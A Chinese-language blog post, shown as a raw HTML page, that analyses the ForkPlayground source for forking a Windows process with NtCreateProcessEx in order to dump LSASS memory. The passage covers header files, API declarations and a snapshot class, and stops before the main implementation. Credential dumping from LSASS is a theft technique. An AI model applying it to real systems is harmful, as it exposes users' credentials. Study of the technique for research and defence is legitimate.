<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <meta name="generator" content="Hugo 0.88.1" />

  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="Muxue" />
  <meta property="og:url" content="https://secxue.github.io/posts/use-fork-dump-lsass/" />
  <link rel="canonical" href="https://secxue.github.io/posts/use-fork-dump-lsass/" /><link rel="alternate" type="application/atom+xml" href="https://secxue.github.ioindex.xml" title="Muxue Blog">

  <script type="application/ld+json">
  {
      "@context" : "http://schema.org",
      "@type" : "BlogPosting",
      "mainEntityOfPage": {
           "@type": "WebPage",
           "@id": "https:\/\/secxue.github.io"
      },
      "articleSection" : "posts",
      "name" : "Use Fork Dump Lsass",
      "headline" : "Use Fork Dump Lsass",
      "description" : "前言 这个东西在我还在学校的时候，就出来了，但是我一直没记录；这下寒假快结束了 我才写分析\u0026hellip;.\n原理可以看下上面参考链接的第一个，我主要写了下源码分析，如何实现的。\n就是用了NtCreateProcess(Ex)来fork进程\n参考链接 https:\/\/billdemirkapi.me\/abusing-windows-implementation-of-fork-for-stealthy-memory-operations\/\nhttps:\/\/github.com\/D4stiny\/ForkPlayground\n源码分析 ForkLib 先分析ForkLib文件夹下的内容\nForkLib.cpp引用了\n#include \u0026#34;pch.h\u0026#34;#include \u0026#34;ForkLib.h\u0026#34;先看pch头文件 定义了一个PCH_H 宏，引用了framework.h头文件\n#pragma once #include \u0026lt;Windows.h\u0026gt;#include \u0026lt;winternl.h\u0026gt; #define RCAST reinterpret_cast #define SCAST static_cast #define CCAST const_cast  #ifdef _DEBUG #include \u0026lt;cstdio\u0026gt;#define DBGPRINT(msg, ...) printf(msg\u0026#34;\\\\n\u0026#34;, __VA_ARGS__) #else #define DBGPRINT(x, ...) #endif  #define PROCESS_CREATE_FLAGS_INHERIT_HANDLES 0x00000004  #pragma comment(lib, \u0026#34;ntdll.lib\u0026#34;)  extern \u0026#34;C\u0026#34; { NTSYSCALLAPI NTSTATUS NTAPI NtCreateProcessEx ( _Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ParentProcess, _In_ ULONG Flags, _In_opt_ HANDLE SectionHandle, _In_opt_ HANDLE DebugPort, _In_opt_ HANDLE ExceptionPort, _In_ ULONG JobMemberLevel ); } 开头他是定义了几个宏，我把对应是上面东西 都写一下",
      "inLanguage" : "en-US",
      "author" : "Muxue",
      "creator" : "Muxue",
      "publisher": "Muxue",
      "accountablePerson" : "Muxue",
      "copyrightHolder" : "Muxue",
      "copyrightYear" : "2022",
      "datePublished": "2022-02-19 20:43:56 \u002b0800 CST",
      "dateModified" : "2022-02-19 20:43:56 \u002b0800 CST",
      "url" : "https:\/\/secxue.github.io\/posts\/use-fork-dump-lsass\/",
      "keywords" : [  ]
  }
</script>
<title>Use Fork Dump Lsass</title>
  <meta property="og:title" content="Use Fork Dump Lsass" />
  <meta property="og:type" content="article" />
  <meta property="og:description" content="前言 这个东西在我还在学校的时候，就出来了，但是我一直没记录；这下寒假快结束了 我才写分析&amp;hellip;.
原理可以看下上面参考链接的第一个，我主要写了下源码分析，如何实现的。
就是用了NtCreateProcess(Ex)来fork进程
参考链接 https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/
https://github.com/D4stiny/ForkPlayground
源码分析 ForkLib 先分析ForkLib文件夹下的内容
ForkLib.cpp引用了
#include &amp;#34;pch.h&amp;#34;#include &amp;#34;ForkLib.h&amp;#34;先看pch头文件 定义了一个PCH_H 宏，引用了framework.h头文件
#pragma once #include &amp;lt;Windows.h&amp;gt;#include &amp;lt;winternl.h&amp;gt; #define RCAST reinterpret_cast #define SCAST static_cast #define CCAST const_cast  #ifdef _DEBUG #include &amp;lt;cstdio&amp;gt;#define DBGPRINT(msg, ...) printf(msg&amp;#34;\\n&amp;#34;, __VA_ARGS__) #else #define DBGPRINT(x, ...) #endif  #define PROCESS_CREATE_FLAGS_INHERIT_HANDLES 0x00000004  #pragma comment(lib, &amp;#34;ntdll.lib&amp;#34;)  extern &amp;#34;C&amp;#34; { NTSYSCALLAPI NTSTATUS NTAPI NtCreateProcessEx ( _Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ParentProcess, _In_ ULONG Flags, _In_opt_ HANDLE SectionHandle, _In_opt_ HANDLE DebugPort, _In_opt_ HANDLE ExceptionPort, _In_ ULONG JobMemberLevel ); } 开头他是定义了几个宏，我把对应是上面东西 都写一下" />
  <meta name="description" content="前言 这个东西在我还在学校的时候，就出来了，但是我一直没记录；这下寒假快结束了 我才写分析&amp;hellip;.
原理可以看下上面参考链接的第一个，我主要写了下源码分析，如何实现的。
就是用了NtCreateProcess(Ex)来fork进程
参考链接 https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/
https://github.com/D4stiny/ForkPlayground
源码分析 ForkLib 先分析ForkLib文件夹下的内容
ForkLib.cpp引用了
#include &amp;#34;pch.h&amp;#34;#include &amp;#34;ForkLib.h&amp;#34;先看pch头文件 定义了一个PCH_H 宏，引用了framework.h头文件
#pragma once #include &amp;lt;Windows.h&amp;gt;#include &amp;lt;winternl.h&amp;gt; #define RCAST reinterpret_cast #define SCAST static_cast #define CCAST const_cast  #ifdef _DEBUG #include &amp;lt;cstdio&amp;gt;#define DBGPRINT(msg, ...) printf(msg&amp;#34;\\n&amp;#34;, __VA_ARGS__) #else #define DBGPRINT(x, ...) #endif  #define PROCESS_CREATE_FLAGS_INHERIT_HANDLES 0x00000004  #pragma comment(lib, &amp;#34;ntdll.lib&amp;#34;)  extern &amp;#34;C&amp;#34; { NTSYSCALLAPI NTSTATUS NTAPI NtCreateProcessEx ( _Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ParentProcess, _In_ ULONG Flags, _In_opt_ HANDLE SectionHandle, _In_opt_ HANDLE DebugPort, _In_opt_ HANDLE ExceptionPort, _In_ ULONG JobMemberLevel ); } 开头他是定义了几个宏，我把对应是上面东西 都写一下" />
  <meta property="og:locale" content="en-us" />

  
    <style>body{font-family:bree serif,sans-serif;-webkit-font-smoothing:antialiased;margin:0 20px}article{max-width:800px;margin-left:auto;margin-right:auto}a{color:#000;text-decoration:none}a:hover{font-weight:600;text-decoration:underline}.post-ads{margin:50px 0}.markdown-body{font-size:18px;max-width:100%}.markdown-body a{text-decoration:underline;text-decoration-color:#000}.markdown-body pre{padding:16px;overflow:auto;border-radius:10px}.markdown-body code{padding:.2em .4em;font-size:85%;background-color:#f6f8fa;border-radius:6px}.markdown-body pre>code{padding:0;font-size:100%;background-color:inherit;border:0}.Chinese .markdown-body{line-height:200%}.site-date-catalog{font-size:2rem}.header-title{font-size:2rem;font-weight:700;margin-top:32px;font-family:bungee shade,sans-serif}.header-title a{text-decoration:none}.header-subtitle{color:#666}.header-items{margin:10px 0}.header-item{margin:0 5px}.header-line{width:100%;border-width:2px;border-color:#482936;border-style:solid none none none}.lang-switch{font-weight:600}#posts-list{min-height:600px}.posts-line{font-size:1.2rem;margin:12px 0}.posts-categories{font-size:.8rem;margin:auto;text-align:center}.posts-category{padding:3px 0;border:#000 2px solid;border-radius:5px}.site-footer{margin-top:50px}.site-footer-item{margin-right:12px}.post-content img{max-width:100%;display:block;margin-right:auto;margin-top:12px}.post-header{margin-bottom:50px}.post-title{font-size:2rem;font-weight:600}.post-tags{display:inline;font-weight:600;padding:2px 5px;margin-right:6px;border:#000 2px solid;border-radius:5px}.post-date{font-weight:800;font-style:italic}.post-author{float:right;font-weight:600}.page-content{min-height:60%}.post-content{margin-bottom:50px}.post-content p{hyphens:auto;line-height:1.8;text-justify:ideographic;margin-bottom:1em}.related-content{border-width:3px;border-style:solid;border-color:#000;padding:0 10px;margin-bottom:50px;margin-top:100px}.related-content li{margin:5px 0}.taxonomy-term{font-size:3rem}.gallery-img{text-align:center}.gallery-img span{text-align:center}.gallery-img-desc{font-size:.8em;font-weight:800}#disqus_thread{position:relative}#disqus_thread:after{content:"";display:block;height:55px;width:100%;position:absolute;bottom:0;background:#fff}@media screen and (max-width:600px){.header-title,.header-subtitle,.header-items{text-align:center}.posts-line{font-size:16px}.markdown-body{font-size:16px}.post-title{font-size:2rem}.post-content p{letter-spacing:.05em}}@media screen and (max-width:48em){.posts-category{display:none}}</style>
  
  
    <style>.container,.container-fluid{margin-right:auto;margin-left:auto}.container-fluid{padding-right:2rem;padding-left:2rem}.row{box-sizing:border-box;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-flex:0;-ms-flex:0 1 auto;flex:initial;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-.5rem;margin-left:-.5rem}.row.reverse{-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.col.reverse{-webkit-box-orient:vertical;-webkit-box-direction:reverse;-ms-flex-direction:column-reverse;flex-direction:column-reverse}.col-xs,.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-offset-0,.col-xs-offset-1,.col-xs-offset-10,.col-xs-offset-11,.col-xs-offset-12,.col-xs-offset-2,.col-xs-offset-3,.col-xs-offset-4,.col-xs-offset-5,.col-xs-offset-6,.col-xs-offset-7,.col-xs-offset-8,.col-xs-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-xs{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-xs-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-xs-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-xs-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-xs-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-xs-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-xs-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-xs-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-xs-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-xs-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-xs-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-xs-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-xs-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-xs-offset-0{margin-left:0}.col-xs-offset-1{margin-left:8.33333333%}.col-xs-offset-2{margin-left:16.66666667%}.col-xs-offset-3{margin-left:25%}.col-xs-offset-4{margin-left:33.33333333%}.col-xs-offset-5{margin-left:41.66666667%}.col-xs-offset-6{margin-left:50%}.col-xs-offset-7{margin-left:58.33333333%}.col-xs-offset-8{margin-left:66.66666667%}.col-xs-offset-9{margin-left:75%}.col-xs-offset-10{margin-left:83.33333333%}.col-xs-offset-11{margin-left:91.66666667%}.start-xs{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-xs{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-xs{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-xs{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-xs{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-xs{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-xs{-ms-flex-pack:distribute;justify-content:space-around}.between-xs{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-xs{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-xs{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}@media only screen and (min-width:48em){.container{width:49rem}.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-offset-0,.col-sm-offset-1,.col-sm-offset-10,.col-sm-offset-11,.col-sm-offset-12,.col-sm-offset-2,.col-sm-offset-3,.col-sm-offset-4,.col-sm-offset-5,.col-sm-offset-6,.col-sm-offset-7,.col-sm-offset-8,.col-sm-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-sm{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-sm-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-sm-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-sm-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-sm-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-sm-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-sm-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-sm-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-sm-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-sm-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-sm-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-sm-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-sm-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-sm-offset-0{margin-left:0}.col-sm-offset-1{margin-left:8.33333333%}.col-sm-offset-2{margin-left:16.66666667%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-4{margin-left:33.33333333%}.col-sm-offset-5{margin-left:41.66666667%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-7{margin-left:58.33333333%}.col-sm-offset-8{margin-left:66.66666667%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-10{margin-left:83.33333333%}.col-sm-offset-11{margin-left:91.66666667%}.start-sm{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-sm{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-sm{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-sm{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-sm{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-sm{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-sm{-ms-flex-pack:distribute;justify-content:space-around}.between-sm{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-sm{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-sm{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}@media only screen and (min-width:64em){.container{width:65rem}.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-offset-0,.col-md-offset-1,.col-md-offset-10,.col-md-offset-11,.col-md-offset-12,.col-md-offset-2,.col-md-offset-3,.col-md-offset-4,.col-md-offset-5,.col-md-offset-6,.col-md-offset-7,.col-md-offset-8,.col-md-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-md{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-md-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-md-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-md-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-md-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-md-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-md-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-md-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-md-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-md-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-md-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-md-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-md-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-md-offset-0{margin-left:0}.col-md-offset-1{margin-left:8.33333333%}.col-md-offset-2{margin-left:16.66666667%}.col-md-offset-3{margin-left:25%}.col-md-offset-4{margin-left:33.33333333%}.col-md-offset-5{margin-left:41.66666667%}.col-md-offset-6{margin-left:50%}.col-md-offset-7{margin-left:58.33333333%}.col-md-offset-8{margin-left:66.66666667%}.col-md-offset-9{margin-left:75%}.col-md-offset-10{margin-left:83.33333333%}.col-md-offset-11{margin-left:91.66666667%}.start-md{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-md{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-md{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-md{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-md{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-md{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-md{-ms-flex-pack:distribute;justify-content:space-around}.between-md{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-md{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-md{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}@media only screen and (min-width:75em){.container{width:76rem}.col-lg,.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-offset-0,.col-lg-offset-1,.col-lg-offset-10,.col-lg-offset-11,.col-lg-offset-12,.col-lg-offset-2,.col-lg-offset-3,.col-lg-offset-4,.col-lg-offset-5,.col-lg-offset-6,.col-lg-offset-7,.col-lg-offset-8,.col-lg-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-lg{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-lg-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-lg-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-lg-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-lg-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-lg-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-lg-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-lg-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-lg-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-lg-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-lg-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-lg-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-lg-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-lg-offset-0{margin-left:0}.col-lg-offset-1{margin-left:8.33333333%}.col-lg-offset-2{margin-left:16.66666667%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-4{margin-left:33.33333333%}.col-lg-offset-5{margin-left:41.66666667%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-7{margin-left:58.33333333%}.col-lg-offset-8{margin-left:66.66666667%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-10{margin-left:83.33333333%}.col-lg-offset-11{margin-left:91.66666667%}.start-lg{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-lg{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-lg{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-lg{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-lg{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-lg{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-lg{-ms-flex-pack:distribute;justify-content:space-around}.between-lg{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-lg{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-lg{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}</style>
  

  

  <link href="/index.xml" rel="alternate" type="application/rss+xml"
    title="Muxue Blog">
  
  <link rel="preconnect" href="https://fonts.gstatic.com">
  <link href="https://fonts.googleapis.com/css?family=Bree+Serif|Bungee+Shade" rel="stylesheet">
  
  

  
  
</head>


<body>
  <article class="post " id="article">
    <div class="row">
      <div class="col-xs-12">
        <div class="site-header">
          
<header>
  <div class="header-title">
    <a href="/"
      >Muxue</a
    >
  </div>
  <div class="header-subtitle"></div>
</header>
<div class="row end-md center-xs header-items">
  
  <div class="header-item">
    <a href="/about" target="_blank">About</a>
  </div>
  
  <div class="header-item">
    <a href="https://twitter.com/secxue" target="_blank">Twitter</a>
  </div>
  
</div>
<div class="row end-xs">
   
</div>
<div class="header-line"></div>

        </div>
        <header class="post-header">
          <h1 class="post-title">Use Fork Dump Lsass</h1>
          
          <div class="row post-desc">
            <div class="col-xs-6">
              
              <time class="post-date" datetime="2022-02-19 20:43:56 CST">
                19 Feb 2022
              </time>
              
            </div>
            <div class="col-xs-6">
              
              <div class="post-author">
                <a target="_blank" href="https://github.com/muxue">@Muxue</a>
              </div>
              
            </div>
          </div>
          
        </header>

        <div class="post-content markdown-body">
          
          <h2 id="前言">前言</h2>
<p>这个东西在我还在学校的时候，就出来了，但是我一直没记录；这下寒假快结束了 我才写分析&hellip;.</p>
<p>原理可以看下上面参考链接的第一个，我主要写了下源码分析，如何实现的。</p>
<p>就是用了<code>NtCreateProcess(Ex)</code>来fork进程</p>
<h2 id="参考链接">参考链接</h2>
<p><a href="https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/">https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/</a></p>
<p><a href="https://github.com/D4stiny/ForkPlayground">https://github.com/D4stiny/ForkPlayground</a></p>
<h2 id="源码分析">源码分析</h2>
<h3 id="forklib">ForkLib</h3>
<p>先分析ForkLib文件夹下的内容</p>
<p><code>ForkLib.cpp</code>引用了</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#75715e">#include</span> <span style="color:#75715e">&#34;pch.h&#34;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&#34;ForkLib.h&#34;</span><span style="color:#75715e">
</span></code></pre></div><p>先看pch头文件 定义了一个<code>PCH_H</code> 宏，引用了framework.h头文件</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#75715e">#pragma once
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;Windows.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;winternl.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#75715e">#define RCAST reinterpret_cast
</span><span style="color:#75715e">#define SCAST static_cast
</span><span style="color:#75715e">#define CCAST const_cast
</span><span style="color:#75715e"></span>
<span style="color:#75715e">#ifdef _DEBUG
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;cstdio&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#define DBGPRINT(msg, ...) printf(msg&#34;\\n&#34;, __VA_ARGS__)
</span><span style="color:#75715e">#else
</span><span style="color:#75715e">#define DBGPRINT(x, ...)
</span><span style="color:#75715e">#endif
</span><span style="color:#75715e"></span>
<span style="color:#75715e">#define PROCESS_CREATE_FLAGS_INHERIT_HANDLES 0x00000004
</span><span style="color:#75715e"></span>
<span style="color:#75715e">#pragma comment(lib, &#34;ntdll.lib&#34;)
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">extern</span> <span style="color:#e6db74">&#34;C&#34;</span>
{
    NTSYSCALLAPI
    NTSTATUS
    NTAPI
    <span style="color:#a6e22e">NtCreateProcessEx</span> (
        _Out_ PHANDLE ProcessHandle,
        _In_ ACCESS_MASK DesiredAccess,
        _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
        _In_ HANDLE ParentProcess,
        _In_ ULONG Flags,
        _In_opt_ HANDLE SectionHandle,
        _In_opt_ HANDLE DebugPort,
        _In_opt_ HANDLE ExceptionPort,
        _In_ ULONG JobMemberLevel
        );
}
</code></pre></div><p>开头他是定义了几个宏，我把对应是上面东西 都写一下</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#66d9ef">reinterpret_cast</span><span style="color:#960050;background-color:#1e0010">：允许将任何指针转换为任何其他指针类型。</span>
<span style="color:#66d9ef">static_cast</span><span style="color:#960050;background-color:#1e0010">：将表达式转换为</span> type<span style="color:#f92672">-</span>id <span style="color:#960050;background-color:#1e0010">的类型。</span>
<span style="color:#66d9ef">const_cast</span><span style="color:#960050;background-color:#1e0010">：是用来移除变量的</span>const或volatile限定符
</code></pre></div><p>然后又定义了Debug的打印输出信息</p>
<p>然后接下来的这句是<code>NtCreateProcessEx</code> 的标志</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#75715e">#define PROCESS_CREATE_FLAGS_INHERIT_HANDLES 0x00000004
</span></code></pre></div><p>最后导入了<code>ntdll.lib</code>和创建了<code>NtCreateProcessEx</code></p>
<p>接着回到<code>ForkLib.cpp</code>发现又引入了ForkLib头文件</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#75715e">/*
</span><span style="color:#75715e"> * FORKLIB - Process Snapshotting via forking.
</span><span style="color:#75715e"> *
</span><span style="color:#75715e"> * This file is subject to the terms and conditions defined in
</span><span style="color:#75715e"> * file &#39;LICENSE&#39;, which is part of this source code package.
</span><span style="color:#75715e"> *
</span><span style="color:#75715e"> * COPYRIGHT Bill Demirkapi 2021
</span><span style="color:#75715e"> */</span>
<span style="color:#75715e">#pragma once
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&#34;pch.h&#34;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">class</span> <span style="color:#a6e22e">ForkSnapshot</span>
{
	<span style="color:#75715e">/// &lt;summary&gt;
</span><span style="color:#75715e"></span>	<span style="color:#75715e">/// A handle to the target process we&#39;re forking. This handle should hold the PROCESS_CREATE_PROCESS right.
</span><span style="color:#75715e"></span>	<span style="color:#75715e">/// &lt;/summary&gt;
</span><span style="color:#75715e"></span>	HANDLE TargetProcess;
	<span style="color:#75715e">/// &lt;summary&gt;
</span><span style="color:#75715e"></span>	<span style="color:#75715e">/// Handle to the current snapshot process.
</span><span style="color:#75715e"></span>	<span style="color:#75715e">/// &lt;/summary&gt;
</span><span style="color:#75715e"></span>	HANDLE CurrentSnapshotProcess;
<span style="color:#66d9ef">public</span><span style="color:#f92672">:</span>
	ForkSnapshot (
		_In_ HANDLE TargetProcess
		);
	ForkSnapshot (
		_In_ DWORD TargetProcessId
		);
	<span style="color:#f92672">~</span>ForkSnapshot (
		VOID
		);

	HANDLE <span style="color:#a6e22e">TakeSnapshot</span> (
		VOID
		);
	BOOL <span style="color:#a6e22e">CleanSnapshot</span> (
		VOID
		);
};
</code></pre></div><p>定义了一个<code>ForkSnapshot</code>类，里面定义了俩句柄，然后构造 析构 函数</p>
<p>接着回到主文件的cpp看，</p>
